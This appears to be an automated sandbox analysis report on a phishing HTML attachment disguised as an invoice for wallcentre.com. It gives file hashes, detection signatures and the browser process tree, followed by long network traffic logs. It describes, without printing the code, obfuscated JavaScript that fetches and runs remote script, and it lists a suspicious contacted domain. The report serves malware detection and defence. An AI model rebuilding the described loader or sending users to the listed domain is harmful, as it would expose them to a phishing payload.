Edit tour

Windows Analysis Report
invoice 700898 for wallcentre.com.shtml

Overview

General Information

Sample name:	invoice 700898 for wallcentre.com.shtml
Analysis ID:	1449222
MD5:	0fa9daf17b59e394c20e983c5901b179
SHA1:	ec21474979e5b43d37e0d39a3e7a9d506c9d78ff
SHA256:	8491c804e82cfa3fe78e9eaeed84771721e9311d84ba6191fdd0ea98ebc9e45f

Detection

Score:	52
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected suspicious javascript

HTML document with suspicious name

HTML document with suspicious title

Detected non-DNS traffic on DNS port

Stores files to the Windows start menu directory

Classification

Process Tree

System is w10x64_ra

chrome.exe (PID: 6932 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\invoice 700898 for wallcentre.com.shtml MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7160 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1944,i,4061923723569728725,10462630434982569038,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

msedge.exe (PID: 7360 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 4008 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2280 --field-trial-handle=1968,i,7785166994045979883,11227575148762897452,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 6704 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=4472 --field-trial-handle=1968,i,7785166994045979883,11227575148762897452,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7904 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6756 --field-trial-handle=1968,i,7785166994045979883,11227575148762897452,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

cleanup

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

AI detected suspicious javascript

Source: file:///C:/Users/user/Desktop/invoice%20700898%20for%20wallcentre.com.shtml

LLM: Score: 8 Reasons: The provided JavaScript code appears to be obfuscated, which is a common technique used by malicious scripts to hide their true purpose. The code constructs a URL by replacing certain patterns in a string and then makes a fetch request to this URL. The response is then executed after a delay using setTimeout. This behavior is suspicious as it could be used to load and execute malicious scripts from an external source. The obfuscation and dynamic execution of code are strong indicators of potentially malicious intent. DOM: 0.0.pages.csv

HTML document with suspicious title

Source: file:///C:/Users/user/Desktop/invoice%20700898%20for%20wallcentre.com.shtml

Tab title: invoice 700898 for wallcentre.com.shtml

Source: invoice 700898 for wallcentre.com.shtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/invoice%20700898%20for%20wallcentre.com.shtml	HTTP Parser: No favicon

Source: unknown	HTTPS traffic detected: 2.19.244.127:443 -> 192.168.2.16:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.16:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.19.244.127:443 -> 192.168.2.16:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.16:54974 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:54977 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.190.159.2:443 -> 192.168.2.16:54978 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.1.33.206:443 -> 192.168.2.16:54979 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.104.15.253:443 -> 192.168.2.16:54980 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:54983 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.70.254:443 -> 192.168.2.16:55007 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.113.196.254:443 -> 192.168.2.16:55037 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:55040 version: TLS 1.2

Source: chrome.exe

Memory has grown: Private usage: 1MB later: 28MB

Source: global traffic	TCP traffic: 192.168.2.16:54972 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:54972 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:54972 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:54972 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:54994 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:54972 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:54994 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:54972 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:54994 -> 1.1.1.1:53

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.209.149
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.244.127
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.244.127
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.244.127
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.244.127
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.244.127
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.244.127
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.244.127
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.244.127
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.244.127
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.244.127
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.244.127
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.244.127
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.244.127
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.244.127
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.244.127
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.244.127
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.244.127
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.244.127
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10

Source: global traffic	DNS traffic detected: DNS query: fbccda778f8.creategoodlife.us
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic	DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic	DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic	DNS traffic detected: DNS query: assets.msn.com
Source: global traffic	DNS traffic detected: DNS query: c.msn.com
Source: global traffic	DNS traffic detected: DNS query: api.msn.com
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com

Source: unknown	Network traffic detected: HTTP traffic on port 55040 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55063 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55069
Source: unknown	Network traffic detected: HTTP traffic on port 55246 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55197
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55074
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55198
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55073
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55199
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55072
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55079
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55193
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55078
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55194
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55077
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55195
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55076
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55196
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55190
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55191
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55192
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55071
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55070
Source: unknown	Network traffic detected: HTTP traffic on port 55108 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55211 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55119 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55154 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55097 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55086
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55085
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55084
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55083
Source: unknown	Network traffic detected: HTTP traffic on port 55051 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55189 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55200 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55088
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55087
Source: unknown	Network traffic detected: HTTP traffic on port 55143 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55086 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49681 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55082
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55081
Source: unknown	Network traffic detected: HTTP traffic on port 55235 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55080
Source: unknown	Network traffic detected: HTTP traffic on port 55258 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55178 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55097
Source: unknown	Network traffic detected: HTTP traffic on port 55270 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55096
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55095
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55094
Source: unknown	Network traffic detected: HTTP traffic on port 55222 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55190 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55052 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55099
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55098
Source: unknown	Network traffic detected: HTTP traffic on port 55085 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55093
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55092
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55091
Source: unknown	Network traffic detected: HTTP traffic on port 55142 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55247 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55074 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 55120 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 55233 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55279 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55118 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55191 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55153 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55267
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55147
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55148
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55153
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55274
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55154
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55275
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55276
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55156
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55277
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55035
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55270
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55150
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55151
Source: unknown	Network traffic detected: HTTP traffic on port 55201 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55272
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55152
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55273
Source: unknown	Network traffic detected: HTTP traffic on port 55213 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55087 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55179 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55039
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55038
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55037
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55036
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55157
Source: unknown	Network traffic detected: HTTP traffic on port 55224 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55278
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55158
Source: unknown	Network traffic detected: HTTP traffic on port 55267 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55279
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55159
Source: unknown	Network traffic detected: HTTP traffic on port 55280 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55164
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55165
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55040
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55166
Source: unknown	Network traffic detected: HTTP traffic on port 55164 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55046
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55160
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55045
Source: unknown	Network traffic detected: HTTP traffic on port 55076 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55161
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55282
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55162
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55283
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55163
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55284
Source: unknown	Network traffic detected: HTTP traffic on port 54974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55280
Source: unknown	Network traffic detected: HTTP traffic on port 55256 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55212 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55049
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55048
Source: unknown	Network traffic detected: HTTP traffic on port 55098 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55047
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55169
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55053
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55175
Source: unknown	Network traffic detected: HTTP traffic on port 55245 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55052
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55176
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55051
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55177
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55050
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55178
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55057
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55171
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55056
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55172
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55055
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55173
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55054
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55174
Source: unknown	Network traffic detected: HTTP traffic on port 55129 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55170
Source: unknown	Network traffic detected: HTTP traffic on port 55180 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55257 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55234 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55064 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55059
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55058
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55179
Source: unknown	Network traffic detected: HTTP traffic on port 55152 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55064
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55186
Source: unknown	Network traffic detected: HTTP traffic on port 55053 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55063
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55187
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55062
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55188
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55061
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55189
Source: unknown	Network traffic detected: HTTP traffic on port 55223 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55068
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55182
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55067
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55183
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55066
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55184
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55065
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55185
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55180
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55181
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55060
Source: unknown	Network traffic detected: HTTP traffic on port 55141 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55208 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55266 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55243 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55054 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55077 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55220 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55140 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55066 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 55232 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55192 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55277 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55181 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55105 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55151 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55088 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55065 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55193 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55139 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55278 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55106 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55255 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55099 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55117 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55162 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55244 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49683 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55128 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55067 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55210 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55276 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55182 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55104 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55127 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55253 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55150 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55115 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55221 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55055 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55231 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55116 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55056 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55209 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55194 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55265 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55078 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55138 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55183 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55254 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55092 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55195 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55114 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55137 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55102 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55045 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55228 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55263 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55252 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55160 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55241 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55023 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55264 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55079 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55184 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55091 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55148 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55205 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55230 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55068 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55057 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55159 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55080 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55275 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55216 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55103 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55101 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54978
Source: unknown	Network traffic detected: HTTP traffic on port 55147 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54977
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54976
Source: unknown	Network traffic detected: HTTP traffic on port 55262 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54974
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54980
Source: unknown	Network traffic detected: HTTP traffic on port 55058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55035 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54989
Source: unknown	Network traffic detected: HTTP traffic on port 55207 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55093 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55196 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54984
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54983
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54982
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54981
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54988
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54987
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54986
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54985
Source: unknown	Network traffic detected: HTTP traffic on port 55136 -> 443
